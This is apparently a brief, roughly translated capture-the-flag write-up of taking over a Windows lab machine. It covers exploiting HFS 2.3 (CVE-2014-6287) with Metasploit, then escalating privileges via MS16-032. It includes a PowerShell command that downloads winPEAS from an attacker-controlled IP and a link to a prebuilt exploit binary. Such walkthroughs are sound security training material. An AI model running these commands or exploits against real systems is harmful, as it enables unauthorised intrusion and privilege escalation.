nmap directly opened the leak scan, found cve-2011-3192, useless, open port 80, go and see
Open is HFS, and nmap scans it out to be HFS2.3
This version of HFS has cve
https://nvd.nist.gov/vuln/detail/CVE-2014-6287
msf has this module ,
directly take down the shell
and get the user. txt
cannot enter admin, you need to
escalate privileges. Start a python service locally and upload winpeas
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:8000/winPEASx64.exe', '.\winPEASx64.exe')"
It seems that there is no information.
Use Windows-Exploit-Suggester to test the patch
systeminfo and get the system information
If you find a lot, let’s take MS16-032 here.
Find a payload
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe and upload it for
execution, and get it successfully arrive